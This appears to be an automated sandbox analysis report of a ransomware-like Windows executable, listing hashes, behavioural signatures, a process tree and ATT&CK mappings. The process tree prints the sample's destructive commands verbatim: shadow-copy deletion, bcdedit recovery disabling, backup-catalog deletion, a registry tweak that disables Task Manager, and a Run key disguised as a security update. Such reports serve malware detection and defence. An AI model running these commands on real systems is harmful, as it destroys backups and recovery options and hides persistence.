Analysis

  • max time kernel
    13s
  • max time network
    110s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    07-05-2021 04:05

General

  • Target

    Compile by raminhk 2.exe

  • Size

    7.9MB

  • MD5

    fb9eb8850ee963bc69583f0227803aef

  • SHA1

    a8c4277662b79d84ebec5f17b83153d364a478a7

  • SHA256

    373dd8d9b31679fa1f46779be91f0d8e378af030bffe91de45d150c78e2cae53

  • SHA512

    2d26b6f014ac2ca6b925ab5dfe259847869d3967754de91c8434f0a932bd2ec844403dfa2bc5b5c3442730c42500e2f0c45d321b416450012aae62128e74942c

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Drops desktop.ini file(s) 24 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Compile by raminhk 2.exe
    "C:\Users\Admin\AppData\Local\Temp\Compile by raminhk 2.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:424
    • C:\Windows\system32\tasklist.exe
      tasklist /FO csv
      2⤵
      • Enumerates processes with tasklist
      • Suspicious use of AdjustPrivilegeToken
      PID:2608
    • C:\Windows\system32\cmd.exe
      cmd /c vssadmin delete shadow /all /quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -q
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2700
      • C:\Windows\system32\vssadmin.exe
        vssadmin delete shadow /all /quiet
        3⤵
          PID:508
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic shadowcopy delete
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1548
      • C:\Windows\system32\cmd.exe
        cmd /c bcdedit /set {default} recoveryenabled No cmd.exe /C bcdedit /set {default} bootstatuspolicy ignoreallfailures C:\Windows\System32\cmd.exe /C vssadmin.exe Delete Shadows /All Quiet
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2008
        • C:\Windows\system32\bcdedit.exe
          bcdedit /set {default} recoveryenabled No
          3⤵
          • Modifies boot configuration data using bcdedit
          PID:2704
      • C:\Windows\system32\cmd.exe
        cmd /c REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3556
        • C:\Windows\system32\reg.exe
          REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
          3⤵
          • Modifies registry key
          PID:2340
      • C:\Windows\system32\cmd.exe
        cmd /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Windows Security Update" /t REG_SZ /d "C:\Users\Admin\WindowsSecurityUpdate.exe /onboot" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3652
        • C:\Windows\system32\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Windows Security Update" /t REG_SZ /d "C:\Users\Admin\WindowsSecurityUpdate.exe /onboot" /f
          3⤵
          • Adds Run key to start application
          • Modifies registry key
          PID:1652
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3908

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    File Deletion

    1
    T1107

    Modify Registry

    2
    T1112

    Discovery

    Process Discovery

    1
    T1057

    Impact

    Inhibit System Recovery

    2
    T1490

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/424-114-0x00000000002E0000-0x0000000001570000-memory.dmp
      Filesize

      18.6MB

    • memory/424-115-0x00007FF8A19C0000-0x00007FF8A19C2000-memory.dmp
      Filesize

      8KB

    • memory/508-118-0x0000000000000000-mapping.dmp
    • memory/1548-119-0x0000000000000000-mapping.dmp
    • memory/1652-125-0x0000000000000000-mapping.dmp
    • memory/2008-120-0x0000000000000000-mapping.dmp
    • memory/2340-123-0x0000000000000000-mapping.dmp
    • memory/2608-116-0x0000000000000000-mapping.dmp
    • memory/2700-117-0x0000000000000000-mapping.dmp
    • memory/2704-121-0x0000000000000000-mapping.dmp
    • memory/3556-122-0x0000000000000000-mapping.dmp
    • memory/3652-124-0x0000000000000000-mapping.dmp